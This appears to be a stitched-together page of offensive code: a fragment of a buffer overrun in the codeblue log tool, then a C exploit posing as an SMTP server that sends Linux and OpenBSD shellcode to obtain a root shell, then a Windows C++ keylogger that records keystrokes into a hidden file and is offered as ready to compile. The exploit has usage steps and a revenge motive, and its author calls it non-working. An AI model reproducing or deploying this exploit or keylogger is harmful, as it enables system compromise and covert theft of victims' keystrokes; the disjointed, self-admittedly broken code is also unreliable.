return -1;
}
elapsed++;
usleep(smtp_timeout * 10000);
continue;
} else {
if (!(flags & FL_BEQUIET))
fprintf(stderr, "[ ERROR: recv() failed: %s\n",
strerror(errno));
fprintf(log, "..... ERROR: recv() failed: %s\n",
strerror(errno));
return -1;
}
}
if ((response[i] == '\n')
|| ((response[i] == '\n') && (response[i + 1] == '\n')))
break;
i++; /* come here often baby? */
}

So slowly but surely, response is overrun, unless it its a newline.


/*
* hi, this is an exploit that doesnt work. it should be enough of a point in
* the right direction though. the overflow is in get_smtp_reply(), codeblue.c
* is pretty damn poor, there are more!!!
*
* being in a funny mood one afternoon, i made some software publicly
* available, the next morning i see this in my mailbox:
*
* ------- begin spouting off ------
* From mystic@tenebrous.com Mon Jul 22 19:50:46 2002
* Return-Path:
* Delivered-To: doe@orbital.wiretapped.net
* Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000
* Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)
* (205.152.58.50)
* by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000
* Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net
* (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
* id <20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels>
* for ; Mon, 22 Jul 2002 15:51:43 -0400
* From: "Michael"
* To: "'Demi Sex God from Hell'"
* Subject: RE: ass the attack spoofing shell
* Date: Mon, 22 Jul 2002 15:50:13 -0400
* Message-ID: <000101c231b8$fedc7740$0200a8c0@Michaels>
* MIME-Version: 1.0
* Content-Type: text/plain;
* charset="us-ascii"
* Content-Transfer-Encoding: 7bit
* X-Priority: 3 (Normal)
* X-MSMail-Priority: Normal
* X-Mailer: Microsoft Outlook, Build 10.0.2616
* Importance: Normal
* X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
* In-Reply-To:
* Status: RO
*
* Annoying. Pointless.
*
* ------- end spouting off -------
*
* HOW RUDE!@##@!@#!
*
* so i had a visit to www.tenebrous.com, found some software written by this
* master coder, and here we are now. hehehe
*
* To use this against a webserver (A) using codeblue.
*
* $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
*
* this will add an entry in the access log.
*
* ON THE SAME HOST:
*
* # ./mystic_anus 25
*
* wait a while.
*
* when codeblue runs it will pull your ip from the logs, connect to your port
* 25 and try to send you a mail. because mystic is an idiot, you will get a
* shell with the openbsd code!!!
*
* if codeblue is running nightly from roots crontab, you will get a
* rootshell!!!
*
* i like exclamation marks !!!!
*
* krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,
* everyone on #cw , everyone in paris (you have a lovely city, i had a lovely
* time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,
* hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who
* lives in london, marlinspike (yo!), the woman who sells me my cigarettes in
* the morning on the way into work, thomas greene, dedmunk, adam, durab.
*
* BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!
*
* propz to dme#!@#!@
*
* dont forget:
*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]- *
******************************************************************************************
*
*/
/* this is almost as shoddy as mystical mikes code */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>


#define OF 2048 /* this is bigger than needed */

/* Optimized the code, now it works better in bad situations */
/* i dont know who wrote this, sorry, if you wrote it, let me know */

char lunix_shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


/*
shell on port 6969/tcp shellcode for OpenBSD by noir
*/

long bsd_shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

int main(int argc, char *argv[])
{
struct sockaddr_in sock_in;
struct sockaddr_in sock_out;
char *port = "25";
int fd, a;
int len;
int opt;
char bigbuf[OF];
char *p;
long lunix_resp = 0xbfffe0ac;
long bsd_resp = 0xdfbfc068;
char *moo = "220 ";

long resp = lunix_resp;
char *shellcode = lunix_shellcode;

printf("strlen scode = %d\n", strlen(shellcode));
if (argc == 2)
port = argv[1];

if (argc > 2) {
fprintf(stderr, "usege: %s [port]\n", argv[0]);
exit(1);
}

resp += 8;

p = bigbuf;
memcpy(p, moo, 4);
p += 4;
memset(p, '\x90', 1020 - strlen(shellcode));
p += 1020 - strlen(shellcode);
memcpy(p, shellcode, strlen(shellcode));
p += strlen(shellcode);
memcpy(p, &resp, 4);
p += 4;
memcpy(p, &resp, 4);
p += 4;
memset(p, '\n', 4);

if ((fd = socket(PF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(1);
}

memset(&sock_in, 0, sizeof(sock_in));
sock_in.sin_family = AF_INET;
sock_in.sin_port = htons(atoi(port));
sock_in.sin_addr.s_addr = INADDR_ANY;
len = sizeof(sock_in);

opt = 1;
if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(int)) == -1) {
perror("setsockopt");
exit(1);
}

if (bind(fd, (struct sockaddr *)&sock_in, len) < 0) {
perror("bind");
exit(1);
}

if (listen(fd, 5) < 0) {
perror("listen");
exit(1);
}

printf("listening on port %d\n", atoi(port));

for (;;) {
len = sizeof(sock_out);
if ((a = accept(fd, (struct sockaddr *)&sock_out, &len)) < 0){
perror("accept");
exit(1);
}
printf("got a connection from %s\n", inet_ntoa(sock_out.sin_addr));
fflush(stdout);

write(a, bigbuf, sizeof(bigbuf));
close(a);
}

return(1);

}

Keylogger in C++

the keylogger.cpp file

#include < stdio.h >
#include < windows.h >
#include "keylogger.h"
bool logging=false;
DWORD TID=0;
HMODULE hMod=0;
HANDLE myFile=0;
HANDLE hThread=0;
HHOOK lHook=0;
HWND prevF=0;
LRESULT __stdcall manticoreProc(int code,WPARAM wParam,LPARAM lParam)
{
    if(code<0)
    {
        return CallNextHookEx(lHook,code,wParam,lParam);
    }
    if(code==HC_ACTION)
    {
        EVENTMSG *pEvt=(EVENTMSG *)lParam;
        if(pEvt->message==WM_KEYDOWN)
        {
            DWORD dwCount,dwBytes;
            char svBuffer[256];
            int vKey,nScan;
            vKey=LOBYTE(pEvt->paramL);
            nScan=HIBYTE(pEvt->paramL);
            nScan<<=16;
            HWND hFocus=GetActiveWindow();
            if(prevF!=hFocus)
            {
                char svTitle[256];
                int nCount;
                nCount=GetWindowText(hFocus,svTitle,256);
                if(nCount>0)
                {
                    char svBuffer[512];
                    wsprintf(svBuffer,"\r\n-----[ %s ]-----\r\n",svTitle);
                    WriteFile(myFile,svBuffer,lstrlen(svBuffer),&dwBytes,NULL);
                }
                prevF=hFocus;
            }
            dwCount=GetKeyNameText(nScan,svBuffer,256);
            if(dwCount)
            {
                if(vKey==VK_SPACE)
                {
                    svBuffer[0]=' ';
                    svBuffer[1]='\0';
                    dwCount=1;
                }
                if(dwCount==1)
                {
                    BYTE kbuf[256];
                    WORD ch;
                    int chcount;
                    GetKeyboardState(kbuf);
                    chcount=ToAscii(vKey,nScan,kbuf,&ch,0);
                    if((chcount>0)&&(ch>=32)&&(ch<=127))
                    {
                        WriteFile(myFile,&ch,chcount,&dwBytes,NULL);
                    }
                }
                else
                {
                    WriteFile(myFile,"[",1,&dwBytes,NULL);
                    WriteFile(myFile,svBuffer,dwCount,&dwBytes,NULL);
                    WriteFile(myFile,"]",1,&dwBytes,NULL);
                    if(vKey==VK_RETURN)
                    {
                        WriteFile(myFile,"\r\n",2,&dwBytes,NULL);
                    }
                }
            }
        }
    }
    DWORD fsize=GetFileSize(myFile,0);
    if(fsize>=5242880)
    {
        SetFilePointer(myFile,0,0,FILE_BEGIN);
        SetEndOfFile(myFile);
    }
    return CallNextHookEx(lHook,code,wParam,lParam);
}
DWORD __stdcall manticoreThread(LPVOID lpv)
{
    MSG msg;
    BYTE keytbl[256];
    for(int i=0;i<256;++i)
    {
        keytbl[i]=0;
    }
    logging=true;
    prevF=0;
    myFile=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
    if(myFile==INVALID_HANDLE_VALUE)
    {
        return 1;
    }
    if(SetFilePointer(myFile,0,0,FILE_END)==0xffffffff)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
    if(lHook==0)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    logging=true;
    while(logging)
    {
        while(PeekMessage(&msg,0,0,0,PM_NOREMOVE))
        {
            GetMessage(&msg,0,0,0);
            if(msg.message==WM_CANCELJOURNAL)
            {
                SetKeyboardState(keytbl);
                lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
                if(lHook==0)
                {
                    CloseHandle(myFile);
                    myFile=0;
                    return 1;
                }
            }
            else
            {
                DispatchMessage(&msg);
            }
        }
        Sleep(1);
    }
    UnhookWindowsHookEx(lHook);
    CloseHandle(myFile);
    myFile=0;
    hThread=0;
    return 0;
}
bool manticoreLog(const char *file)
{
    if(logging==true)
    {
        return false;
    }
    hThread=CreateThread(0,0,manticoreThread,(LPVOID)file,0,&TID);
    if(hThread==0)
    {
        return false;
    }
    return true;
}
bool manticoreStop()
{
    if(logging==false)
    {
        return false;
    }
    if(WaitForSingleObject(hThread,2000)==WAIT_OBJECT_0)
    {
        return false;
    }
    logging=false;
    return true;
}


the keylogger.h header file

#ifndef KEYLOGGER_H
#define KEYLOGGER_H
#include
extern HMODULE hMod;
LRESULT __stdcall manticoreProc(int,WPARAM,LPARAM);
DWORD __stdcall manticoreThread(LPVOID);
bool manticoreLog(const char *);
bool manticoreStop();
#endif

ready to b compiled :-)